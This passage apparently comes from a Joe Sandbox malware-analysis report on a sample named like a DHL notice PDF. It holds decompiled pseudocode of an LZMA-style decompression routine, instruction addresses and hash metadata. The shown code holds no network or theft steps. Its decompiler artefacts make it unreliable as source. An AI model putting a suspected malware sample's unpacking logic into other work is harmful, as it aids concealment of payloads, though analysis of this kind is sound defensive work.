                                                            										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                            										__eflags =  *_t391;
                                                            										goto L119;
                                                            									}
                                                            									__eax =  *(__ebp - 0x50);
                                                            									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                            									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                            									__eax =  *(__ebp - 0x58);
                                                            									__esi = __edi + __eax;
                                                            									 *(__ebp - 0x54) = __esi;
                                                            									__ax =  *__esi;
                                                            									__ecx = __ax & 0x0000ffff;
                                                            									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                            									__eflags =  *(__ebp - 0xc) - __edx;
                                                            									if( *(__ebp - 0xc) >= __edx) {
                                                            										__ecx = 0;
                                                            										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                            										__ecx = 1;
                                                            										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                            										__ebx = 1;
                                                            										__ecx =  *(__ebp - 0x48);
                                                            										__ebx = 1 << __cl;
                                                            										__ecx = 1 << __cl;
                                                            										__ebx =  *(__ebp - 0x44);
                                                            										__ebx =  *(__ebp - 0x44) | __ecx;
                                                            										__cx = __ax;
                                                            										__cx = __ax >> 5;
                                                            										__eax = __eax - __ecx;
                                                            										__edi = __edi + 1;
                                                            										__eflags = __edi;
                                                            										 *(__ebp - 0x44) = __ebx;
                                                            										 *__esi = __ax;
                                                            										 *(__ebp - 0x50) = __edi;
                                                            									} else {
                                                            										 *(__ebp - 0x10) = __edx;
                                                            										0x800 = 0x800 - __ecx;
                                                            										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                            										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                            										 *__esi = __dx;
                                                            									}
                                                            									__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                            									if( *(__ebp - 0x10) >= 0x1000000) {
                                                            										L111:
                                                            										_t368 = __ebp - 0x48;
                                                            										 *_t368 =  *(__ebp - 0x48) + 1;
                                                            										__eflags =  *_t368;
                                                            										goto L112;
                                                            									} else {
                                                            										goto L109;
                                                            									}
                                                            								}
                                                            								__ecx =  *(__ebp - 0xc);
                                                            								__ebx = __ebx + __ebx;
                                                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                            								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                            								 *(__ebp - 0x44) = __ebx;
                                                            								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                            									__ecx =  *(__ebp - 0x10);
                                                            									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                            									__ebx = __ebx | 0x00000001;
                                                            									__eflags = __ebx;
                                                            									 *(__ebp - 0x44) = __ebx;
                                                            								}
                                                            								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                            								if( *(__ebp - 0x10) >= 0x1000000) {
                                                            									L101:
                                                            									_t338 = __ebp - 0x48;
                                                            									 *_t338 =  *(__ebp - 0x48) - 1;
                                                            									__eflags =  *_t338;
                                                            									goto L102;
                                                            								} else {
                                                            									goto L99;
                                                            								}
                                                            							}
                                                            							__edx =  *(__ebp - 4);
                                                            							__eax = __eax - __ebx;
                                                            							 *(__ebp - 0x40) = __ecx;
                                                            							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                            							goto L108;
                                                            						case 0x1a:
                                                            							L56:
                                                            							__eflags =  *(__ebp - 0x64);
                                                            							if( *(__ebp - 0x64) == 0) {
                                                            								 *(__ebp - 0x88) = 0x1a;
                                                            								goto L170;
                                                            							}
                                                            							__ecx =  *(__ebp - 0x68);
                                                            							__al =  *(__ebp - 0x5c);
                                                            							__edx =  *(__ebp - 8);
                                                            							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                            							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                            							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                            							 *( *(__ebp - 0x68)) = __al;
                                                            							__ecx =  *(__ebp - 0x14);
                                                            							 *(__ecx +  *(__ebp - 8)) = __al;
                                                            							__eax = __ecx + 1;
                                                            							__edx = 0;
                                                            							_t192 = __eax %  *(__ebp - 0x74);
                                                            							__eax = __eax /  *(__ebp - 0x74);
                                                            							__edx = _t192;
                                                            							goto L79;
                                                            						case 0x1b:
                                                            							goto L75;
                                                            						case 0x1c:
                                                            							while(1) {
                                                            								L123:
                                                            								__eflags =  *(__ebp - 0x64);
                                                            								if( *(__ebp - 0x64) == 0) {
                                                            									break;
                                                            								}
                                                            								__eax =  *(__ebp - 0x14);
                                                            								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                            								__eflags = __eax -  *(__ebp - 0x74);
                                                            								if(__eax >=  *(__ebp - 0x74)) {
                                                            									__eax = __eax +  *(__ebp - 0x74);
                                                            									__eflags = __eax;
                                                            								}
                                                            								__edx =  *(__ebp - 8);
                                                            								__cl =  *(__eax + __edx);
                                                            								__eax =  *(__ebp - 0x14);
                                                            								 *(__ebp - 0x5c) = __cl;
                                                            								 *(__eax + __edx) = __cl;
                                                            								__eax = __eax + 1;
                                                            								__edx = 0;
                                                            								_t414 = __eax %  *(__ebp - 0x74);
                                                            								__eax = __eax /  *(__ebp - 0x74);
                                                            								__edx = _t414;
                                                            								__eax =  *(__ebp - 0x68);
                                                            								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                            								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                            								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                            								__eflags =  *(__ebp - 0x30);
                                                            								 *( *(__ebp - 0x68)) = __cl;
                                                            								 *(__ebp - 0x14) = _t414;
                                                            								if( *(__ebp - 0x30) > 0) {
                                                            									continue;
                                                            								} else {
                                                            									goto L80;
                                                            								}
                                                            							}
                                                            							 *(__ebp - 0x88) = 0x1c;
                                                            							goto L170;
                                                            					}
                                                            				}
                                                            			}













                                                            0x00406e65
                                                            0x00406e65
                                                            0x00406e69
                                                            0x00406e71
                                                            0x00406e76
                                                            0x00406e78
                                                            0x00406e7a
                                                            0x00406e7a
                                                            0x00406e9c
                                                            0x00406ea3
                                                            0x00406ea6
                                                            0x00000000
                                                            0x00406eac
                                                            0x00000000
                                                            0x00406eac
                                                            0x00000000
                                                            0x00406eb1
                                                            0x00406eb1
                                                            0x00406eb5
                                                            0x00407575
                                                            0x00000000
                                                            0x00407575
                                                            0x00406ebb
                                                            0x00406ebe
                                                            0x00406ec1
                                                            0x00406ec5
                                                            0x00406ec8
                                                            0x00406ece
                                                            0x00406ed0
                                                            0x00406ed0
                                                            0x00406ed0
                                                            0x00406ed3
                                                            0x00406ed6
                                                            0x00406ed6
                                                            0x00406ed6
                                                            0x00406edc
                                                            0x00000000
                                                            0x00000000
                                                            0x00406ede
                                                            0x00406ee1
                                                            0x00406ee4
                                                            0x00406ee7
                                                            0x00406eea
                                                            0x00406eed
                                                            0x00406ef0
                                                            0x00406ef3
                                                            0x00406ef6
                                                            0x00406ef9
                                                            0x00406efc
                                                            0x00406f14
                                                            0x00406f17
                                                            0x00406f1a
                                                            0x00406f1d
                                                            0x00406f1d
                                                            0x00406f20
                                                            0x00406f24
                                                            0x00406f26
                                                            0x00406efe
                                                            0x00406efe
                                                            0x00406f06
                                                            0x00406f0b
                                                            0x00406f0d
                                                            0x00406f0f
                                                            0x00406f0f
                                                            0x00406f29
                                                            0x00406f30
                                                            0x00406f33
                                                            0x00000000
                                                            0x00406f35
                                                            0x00000000
                                                            0x00406f35
                                                            0x00406f33
                                                            0x00406f3a
                                                            0x00406f3a
                                                            0x00406f3a
                                                            0x00406f3a
                                                            0x00000000
                                                            0x00000000
                                                            0x00406f75
                                                            0x00406f75
                                                            0x00406f79
                                                            0x00407581
                                                            0x00000000
                                                            0x00407581
                                                            0x00406f7f
                                                            0x00406f82
                                                            0x00406f85
                                                            0x00406f89
                                                            0x00406f8c
                                                            0x00406f92
                                                            0x00406f94
                                                            0x00406f94
                                                            0x00406f94
                                                            0x00406f97
                                                            0x00406f9a
                                                            0x00406f9a
                                                            0x00406fa0
                                                            0x00406f3e
                                                            0x00406f3e
                                                            0x00406f41
                                                            0x00000000
                                                            0x00406f41
                                                            0x00406fa2
                                                            0x00406fa2
                                                            0x00406fa5
                                                            0x00406fa8
                                                            0x00406fab
                                                            0x00406fae
                                                            0x00406fb1
                                                            0x00406fb4
                                                            0x00406fb7
                                                            0x00406fba
                                                            0x00406fbd
                                                            0x00406fc0
                                                            0x00406fd8
                                                            0x00406fdb
                                                            0x00406fde
                                                            0x00406fe1
                                                            0x00406fe1
                                                            0x00406fe4
                                                            0x00406fe8
                                                            0x00406fea
                                                            0x00406fc2
                                                            0x00406fc2
                                                            0x00406fca
                                                            0x00406fcf
                                                            0x00406fd1
                                                            0x00406fd3
                                                            0x00406fd3
                                                            0x00406fed
                                                            0x00406ff4
                                                            0x00406ff7
                                                            0x00000000
                                                            0x00406ff9
                                                            0x00000000
                                                            0x00406ff9
                                                            0x00000000
                                                            0x00407286
                                                            0x00407286
                                                            0x0040728a
                                                            0x004075b1
                                                            0x00000000
                                                            0x004075b1
                                                            0x00407290
                                                            0x00407293
                                                            0x00407296
                                                            0x0040729a
                                                            0x0040729d
                                                            0x004072a3
                                                            0x004072a5
                                                            0x004072a5
                                                            0x004072a5
                                                            0x004072a8
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00407395
                                                            0x00407399
                                                            0x004073bb
                                                            0x004073be
                                                            0x004073c8
                                                            0x00000000
                                                            0x004073c8
                                                            0x0040739b
                                                            0x0040739e
                                                            0x004073a2
                                                            0x004073a5
                                                            0x004073a5
                                                            0x004073a8
                                                            0x00000000
                                                            0x00000000
                                                            0x00407452
                                                            0x00407456
                                                            0x00407474
                                                            0x00407474
                                                            0x00407474
                                                            0x0040747b
                                                            0x00407482
                                                            0x00407489
                                                            0x00407489
                                                            0x00000000
                                                            0x00407489
                                                            0x00407458
                                                            0x0040745b
                                                            0x0040745e
                                                            0x00407461
                                                            0x00407468
                                                            0x004073ac
                                                            0x004073ac
                                                            0x004073af
                                                            0x00000000
                                                            0x00000000
                                                            0x00407543
                                                            0x00407546
                                                            0x00000000
                                                            0x00000000
                                                            0x0040717d
                                                            0x0040717f
                                                            0x00407186
                                                            0x00407187
                                                            0x00407189
                                                            0x0040718c
                                                            0x00000000
                                                            0x00000000
                                                            0x00407194
                                                            0x00407197
                                                            0x0040719a
                                                            0x0040719c
                                                            0x0040719e
                                                            0x0040719e
                                                            0x0040719f
                                                            0x004071a2
                                                            0x004071a9
                                                            0x004071ac
                                                            0x004071ba
                                                            0x00000000
                                                            0x00000000
                                                            0x00407490
                                                            0x00407490
                                                            0x00407493
                                                            0x0040749a
                                                            0x00000000
                                                            0x00000000
                                                            0x0040749f
                                                            0x0040749f
                                                            0x004074a3
                                                            0x004075db
                                                            0x00000000
                                                            0x004075db
                                                            0x004074a9
                                                            0x004074ac
                                                            0x004074af
                                                            0x004074b3
                                                            0x004074b6
                                                            0x004074bc
                                                            0x004074be
                                                            0x004074be
                                                            0x004074be
                                                            0x004074c1
                                                            0x004074c4
                                                            0x004074c4
                                                            0x004074c4
                                                            0x004074c4
                                                            0x004074c7
                                                            0x004074c7
                                                            0x004074cb
                                                            0x0040752b
                                                            0x0040752e
                                                            0x00407533
                                                            0x00407534
                                                            0x00407536
                                                            0x00407538
                                                            0x0040753b
                                                            0x00000000
                                                            0x0040753b
                                                            0x004074cd
                                                            0x004074d3
                                                            0x004074d6
                                                            0x004074d9
                                                            0x004074dc
                                                            0x004074df
                                                            0x004074e2
                                                            0x004074e5
                                                            0x004074e8
                                                            0x004074eb
                                                            0x004074ee
                                                            0x00407507
                                                            0x0040750a
                                                            0x0040750d
                                                            0x00407510
                                                            0x00407514
                                                            0x00407516
                                                            0x00407516
                                                            0x00407517
                                                            0x0040751a
                                                            0x004074f0
                                                            0x004074f0
                                                            0x004074f8
                                                            0x004074fd
                                                            0x004074ff
                                                            0x00407502
                                                            0x00407502
                                                            0x0040751d
                                                            0x00407524
                                                            0x00000000
                                                            0x00407526
                                                            0x00000000
                                                            0x00407526
                                                            0x00000000
                                                            0x004071c2
                                                            0x004071c5
                                                            0x004071fb
                                                            0x0040732b
                                                            0x0040732b
                                                            0x0040732b
                                                            0x0040732b
                                                            0x0040732e
                                                            0x0040732e
                                                            0x00407331
                                                            0x00407333
                                                            0x004075bd
                                                            0x00000000
                                                            0x004075bd
                                                            0x00407339
                                                            0x0040733c
                                                            0x00000000
                                                            0x00000000
                                                            0x00407342
                                                            0x00407346
                                                            0x00407349
                                                            0x00407349
                                                            0x00407349
                                                            0x00000000
                                                            0x00407349
                                                            0x004071c7
                                                            0x004071c9
                                                            0x004071cb
                                                            0x004071cd
                                                            0x004071d0
                                                            0x004071d1
                                                            0x004071d3
                                                            0x004071d5
                                                            0x004071d8
                                                            0x004071db
                                                            0x004071f1
                                                            0x004071f6
                                                            0x0040722e
                                                            0x0040722e
                                                            0x00407232
                                                            0x0040725e
                                                            0x00407260
                                                            0x00407267
                                                            0x0040726a
                                                            0x0040726d
                                                            0x0040726d
                                                            0x00407272
                                                            0x00407272
                                                            0x00407274
                                                            0x00407277
                                                            0x0040727e
                                                            0x00407281
                                                            0x004072ae
                                                            0x004072ae
                                                            0x004072b1
                                                            0x004072b4
                                                            0x00407328
                                                            0x00407328
                                                            0x00407328
                                                            0x00000000
                                                            0x00407328
                                                            0x004072b6
                                                            0x004072bc
                                                            0x004072bf
                                                            0x004072c2
                                                            0x004072c5
                                                            0x004072c8
                                                            0x004072cb
                                                            0x004072ce
                                                            0x004072d1
                                                            0x004072d4
                                                            0x004072d7
                                                            0x004072f0
                                                            0x004072f2
                                                            0x004072f5
                                                            0x004072f6
                                                            0x004072f9
                                                            0x004072fb
                                                            0x004072fe
                                                            0x00407300
                                                            0x00407302
                                                            0x00407305
                                                            0x00407307
                                                            0x0040730a
                                                            0x0040730e
                                                            0x00407310
                                                            0x00407310
                                                            0x00407311
                                                            0x00407314
                                                            0x00407317
                                                            0x004072d9
                                                            0x004072d9
                                                            0x004072e1
                                                            0x004072e6
                                                            0x004072e8
                                                            0x004072eb
                                                            0x004072eb
                                                            0x0040731a
                                                            0x00407321
                                                            0x004072ab
                                                            0x004072ab
                                                            0x004072ab
                                                            0x004072ab
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • Opcode ID: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
                                                            • Instruction ID: 0a676f48c9952aad729ccf503b6a86ce95496029d8c73069f89f3073be052f6e
                                                            • Opcode Fuzzy Hash: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
                                                            • Instruction Fuzzy Hash: C3813471D08228DFDF24CFA8C8847ADBBB1FB44305F24816AD456BB281D778A986DF05
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 98%
                                                            			E00406BB0(void* __ecx) {
                                                            				void* _v8;
                                                            				void* _v12;
                                                            				signed int _v16;
                                                            				unsigned int _v20;
                                                            				signed int _v24;
                                                            				signed int _v28;
                                                            				signed int _v32;
                                                            				signed int _v36;
                                                            				signed int _v40;
                                                            				signed int _v44;
                                                            				signed int _v48;
                                                            				signed int _v52;
                                                            				signed int _v56;
                                                            				signed int _v60;
                                                            				signed int _v64;
                                                            				signed int _v68;
                                                            				signed int _v72;
                                                            				signed int _v76;
                                                            				signed int _v80;
                                                            				signed int _v84;
                                                            				signed int _v88;
                                                            				signed int _v92;
                                                            				signed int _v95;
                                                            				signed int _v96;
                                                            				signed int _v100;
                                                            				signed int _v104;
                                                            				signed int _v108;
                                                            				signed int _v112;
                                                            				signed int _v116;
                                                            				signed int _v120;
                                                            				intOrPtr _v124;
                                                            				signed int _v128;
                                                            				signed int _v132;
                                                            				signed int _v136;
                                                            				void _v140;
                                                            				void* _v148;
                                                            				signed int _t537;
                                                            				signed int _t538;
                                                            				signed int _t572;
                                                            
                                                            				_t572 = 0x22;
                                                            				_v148 = __ecx;
                                                            				memcpy( &_v140, __ecx, _t572 << 2);
                                                            				if(_v52 == 0xffffffff) {
                                                            					return 1;
                                                            				}
                                                            				while(1) {
                                                            					L3:
                                                            					_t537 = _v140;
                                                            					if(_t537 > 0x1c) {
                                                            						break;
                                                            					}
                                                            					switch( *((intOrPtr*)(_t537 * 4 +  &M00407602))) {
                                                            						case 0:
                                                            							__eflags = _v112;
                                                            							if(_v112 == 0) {
                                                            								goto L173;
                                                            							}
                                                            							_v112 = _v112 - 1;
                                                            							_v116 = _v116 + 1;
                                                            							_t537 =  *_v116;
                                                            							__eflags = _t537 - 0xe1;
                                                            							if(_t537 > 0xe1) {
                                                            								goto L174;
                                                            							}
                                                            							_t542 = _t537 & 0x000000ff;
                                                            							_push(0x2d);
                                                            							asm("cdq");
                                                            							_pop(_t576);
                                                            							_push(9);
                                                            							_pop(_t577);
                                                            							_t622 = _t542 / _t576;
                                                            							_t544 = _t542 % _t576 & 0x000000ff;
                                                            							asm("cdq");
                                                            							_t617 = _t544 % _t577 & 0x000000ff;
                                                            							_v64 = _t617;
                                                            							_v32 = (1 << _t622) - 1;
                                                            							_v28 = (1 << _t544 / _t577) - 1;
                                                            							_t625 = (0x300 << _t617 + _t622) + 0x736;
                                                            							__eflags = 0x600 - _v124;
                                                            							if(0x600 == _v124) {
                                                            								L12:
                                                            								__eflags = _t625;
                                                            								if(_t625 == 0) {
                                                            									L14:
                                                            									_v76 = _v76 & 0x00000000;
                                                            									_v68 = _v68 & 0x00000000;
                                                            									goto L17;
                                                            								} else {
                                                            									goto L13;
                                                            								}
                                                            								do {
                                                            									L13:
                                                            									_t625 = _t625 - 1;
                                                            									__eflags = _t625;
                                                            									 *((short*)(_v8 + _t625 * 2)) = 0x400;
                                                            								} while (_t625 != 0);
                                                            								goto L14;
                                                            							}
                                                            							__eflags = _v8;
                                                            							if(_v8 != 0) {
                                                            								GlobalFree(_v8);
                                                            							}
                                                            							_t537 = GlobalAlloc(0x40, 0x600); // executed
                                                            							__eflags = _t537;
                                                            							_v8 = _t537;
                                                            							if(_t537 == 0) {
                                                            								goto L174;
                                                            							} else {
                                                            								_v124 = 0x600;
                                                            								goto L12;
                                                            							}
                                                            						case 1:
                                                            							L15:
                                                            							__eflags = _v112;
                                                            							if(_v112 == 0) {
                                                            								_v140 = 1;
                                                            								goto L173;
                                                            							}
                                                            							_v112 = _v112 - 1;
                                                            							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
                                                            							_v116 = _v116 + 1;
                                                            							_t50 =  &_v76;
                                                            							 *_t50 = _v76 + 1;
                                                            							__eflags =  *_t50;
                                                            							L17:
                                                            							__eflags = _v76 - 4;
                                                            							if(_v76 < 4) {
                                                            								goto L15;
                                                            							}
                                                            							_t550 = _v68;
                                                            							__eflags = _t550 - _v120;
                                                            							if(_t550 == _v120) {
                                                            								L22:
                                                            								_v76 = 5;
                                                            								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
                                                            								goto L25;
                                                            							}
                                                            							__eflags = _v12;
                                                            							_v120 = _t550;
                                                            							if(_v12 != 0) {
                                                            								GlobalFree(_v12);
                                                            							}
                                                            							_t537 = GlobalAlloc(0x40, _v68); // executed
                                                            							__eflags = _t537;
                                                            							_v12 = _t537;
                                                            							if(_t537 == 0) {
                                                            								goto L174;
                                                            							} else {
                                                            								goto L22;
                                                            							}
                                                            						case 2:
                                                            							L26:
                                                            							_t557 = _v100 & _v32;
                                                            							_v136 = 6;
                                                            							_v80 = _t557;
                                                            							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
                                                            							goto L135;
                                                            						case 3:
                                                            							L23:
                                                            							__eflags = _v112;
                                                            							if(_v112 == 0) {
                                                            								_v140 = 3;
                                                            								goto L173;
                                                            							}
                                                            							_v112 = _v112 - 1;
                                                            							_t72 =  &_v116;
                                                            							 *_t72 = _v116 + 1;
                                                            							__eflags =  *_t72;
                                                            							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                            							L25:
                                                            							_v76 = _v76 - 1;
                                                            							__eflags = _v76;
                                                            							if(_v76 != 0) {
                                                            								goto L23;
                                                            							}
                                                            							goto L26;
                                                            						case 4:
                                                            							L136:
                                                            							_t559 =  *_t626;
                                                            							_t610 = _t559 & 0x0000ffff;
                                                            							_t591 = (_v20 >> 0xb) * _t610;
                                                            							__eflags = _v16 - _t591;
                                                            							if(_v16 >= _t591) {
                                                            								_v20 = _v20 - _t591;
                                                            								_v16 = _v16 - _t591;
                                                            								_v68 = 1;
                                                            								_t560 = _t559 - (_t559 >> 5);
                                                            								__eflags = _t560;
                                                            								 *_t626 = _t560;
                                                            							} else {
                                                            								_v20 = _t591;
                                                            								_v68 = _v68 & 0x00000000;
                                                            								 *_t626 = (0x800 - _t610 >> 5) + _t559;
                                                            							}
                                                            							__eflags = _v20 - 0x1000000;
                                                            							if(_v20 >= 0x1000000) {
                                                            								goto L142;
                                                            							} else {
                                                            								goto L140;
                                                            							}
                                                            						case 5:
                                                            							L140:
                                                            							__eflags = _v112;
                                                            							if(_v112 == 0) {
                                                            								_v140 = 5;
                                                            								goto L173;
                                                            							}
                                                            							_v20 = _v20 << 8;
                                                            							_v112 = _v112 - 1;
                                                            							_t464 =  &_v116;
                                                            							 *_t464 = _v116 + 1;
                                                            							__eflags =  *_t464;
                                                            							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                            							L142:
                                                            							_t561 = _v136;
                                                            							goto L143;
                                                            						case 6:
                                                            							__edx = 0;
                                                            							__eflags = _v68;
                                                            							if(_v68 != 0) {
                                                            								__eax = _v8;
                                                            								__ecx = _v60;
                                                            								_v56 = 1;
                                                            								_v136 = 7;
                                                            								__esi = _v8 + 0x180 + _v60 * 2;
                                                            								goto L135;
                                                            							}
                                                            							__eax = _v96 & 0x000000ff;
                                                            							__esi = _v100;
                                                            							__cl = 8;
                                                            							__cl = 8 - _v64;
                                                            							__esi = _v100 & _v28;
                                                            							__eax = (_v96 & 0x000000ff) >> 8;
                                                            							__ecx = _v64;
                                                            							__esi = (_v100 & _v28) << 8;
                                                            							__ecx = _v8;
                                                            							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
                                                            							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
                                                            							__eflags = _v60 - 4;
                                                            							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                                                            							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                                                            							if(_v60 >= 4) {
                                                            								__eflags = _v60 - 0xa;
                                                            								if(_v60 >= 0xa) {
                                                            									_t103 =  &_v60;
                                                            									 *_t103 = _v60 - 6;
                                                            									__eflags =  *_t103;
                                                            								} else {
                                                            									_v60 = _v60 - 3;
                                                            								}
                                                            							} else {
                                                            								_v60 = 0;
                                                            							}
                                                            							__eflags = _v56 - __edx;
                                                            							if(_v56 == __edx) {
                                                            								__ebx = 0;
                                                            								__ebx = 1;
                                                            								goto L63;
                                                            							}
                                                            							__eax = _v24;
                                                            							__eax = _v24 - _v48;
                                                            							__eflags = __eax - _v120;
                                                            							if(__eax >= _v120) {
                                                            								__eax = __eax + _v120;
                                                            								__eflags = __eax;
                                                            							}
                                                            							__ecx = _v12;
                                                            							__ebx = 0;
                                                            							__ebx = 1;
                                                            							__al =  *((intOrPtr*)(__eax + __ecx));
                                                            							_v95 =  *((intOrPtr*)(__eax + __ecx));
                                                            							goto L43;
                                                            						case 7:
                                                            							__eflags = _v68 - 1;
                                                            							if(_v68 != 1) {
                                                            								__eax = _v40;
                                                            								_v132 = 0x16;
                                                            								_v36 = _v40;
                                                            								__eax = _v44;
                                                            								_v40 = _v44;
                                                            								__eax = _v48;
                                                            								_v44 = _v48;
                                                            								__eax = 0;
                                                            								__eflags = _v60 - 7;
                                                            								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                            								__al = __al & 0x000000fd;
                                                            								__eax = (__eflags >= 0) - 1 + 0xa;
                                                            								_v60 = (__eflags >= 0) - 1 + 0xa;
                                                            								__eax = _v8;
                                                            								__eax = _v8 + 0x664;
                                                            								__eflags = __eax;
                                                            								_v92 = __eax;
                                                            								goto L71;
                                                            							}
                                                            							__eax = _v8;
                                                            							__ecx = _v60;
                                                            							_v136 = 8;
                                                            							__esi = _v8 + 0x198 + _v60 * 2;
                                                            							goto L135;
                                                            						case 8:
                                                            							__eflags = _v68;
                                                            							if(_v68 != 0) {
                                                            								__eax = _v8;
                                                            								__ecx = _v60;
                                                            								_v136 = 0xa;
                                                            								__esi = _v8 + 0x1b0 + _v60 * 2;
                                                            							} else {
                                                            								__eax = _v60;
                                                            								__ecx = _v8;
                                                            								__eax = _v60 + 0xf;
                                                            								_v136 = 9;
                                                            								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
                                                            								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
                                                            							}
                                                            							goto L135;
                                                            						case 9:
                                                            							__eflags = _v68;
                                                            							if(_v68 != 0) {
                                                            								goto L92;
                                                            							}
                                                            							__eflags = _v100;
                                                            							if(_v100 == 0) {
                                                            								goto L174;
                                                            							}
                                                            							__eax = 0;
                                                            							__eflags = _v60 - 7;
                                                            							_t264 = _v60 - 7 >= 0;
                                                            							__eflags = _t264;
                                                            							0 | _t264 = _t264 + _t264 + 9;
                                                            							_v60 = _t264 + _t264 + 9;
                                                            							goto L78;
                                                            						case 0xa:
                                                            							__eflags = _v68;
                                                            							if(_v68 != 0) {
                                                            								__eax = _v8;
                                                            								__ecx = _v60;
                                                            								_v136 = 0xb;
                                                            								__esi = _v8 + 0x1c8 + _v60 * 2;
                                                            								goto L135;
                                                            							}
                                                            							__eax = _v44;
                                                            							goto L91;
                                                            						case 0xb:
                                                            							__eflags = _v68;
                                                            							if(_v68 != 0) {
                                                            								__ecx = _v40;
                                                            								__eax = _v36;
                                                            								_v36 = _v40;
                                                            							} else {
                                                            								__eax = _v40;
                                                            							}
                                                            							__ecx = _v44;
                                                            							_v40 = _v44;
                                                            							L91:
                                                            							__ecx = _v48;
                                                            							_v48 = __eax;
                                                            							_v44 = _v48;
                                                            							L92:
                                                            							__eax = _v8;
                                                            							_v132 = 0x15;
                                                            							__eax = _v8 + 0xa68;
                                                            							_v92 = _v8 + 0xa68;
                                                            							goto L71;
                                                            						case 0xc:
                                                            							L102:
                                                            							__eflags = _v112;
                                                            							if(_v112 == 0) {
                                                            								_v140 = 0xc;
                                                            								goto L173;
                                                            							}
                                                            							__ecx = _v116;
                                                            							__eax = _v16;
                                                            							_v20 = _v20 << 8;
                                                            							__ecx =  *_v116 & 0x000000ff;
                                                            							_v112 = _v112 - 1;
                                                            							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                            							_t340 =  &_v116;
                                                            							 *_t340 = _v116 + 1;
                                                            							__eflags =  *_t340;
                                                            							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                            							__eax = _v48;
                                                            							goto L104;
                                                            						case 0xd:
                                                            							L39:
                                                            							__eflags = _v112;
                                                            							if(_v112 == 0) {
                                                            								_v140 = 0xd;
                                                            								goto L173;
                                                            							}
                                                            							__ecx = _v116;
                                                            							__eax = _v16;
                                                            							_v20 = _v20 << 8;
                                                            							__ecx =  *_v116 & 0x000000ff;
                                                            							_v112 = _v112 - 1;
                                                            							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                            							_t127 =  &_v116;
                                                            							 *_t127 = _v116 + 1;
                                                            							__eflags =  *_t127;
                                                            							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                            							L41:
                                                            							__eax = _v68;
                                                            							__eflags = _v76 - _v68;
                                                            							if(_v76 != _v68) {
                                                            								goto L50;
                                                            							}
                                                            							__eflags = __ebx - 0x100;
                                                            							if(__ebx >= 0x100) {
                                                            								goto L56;
                                                            							}
                                                            							L43:
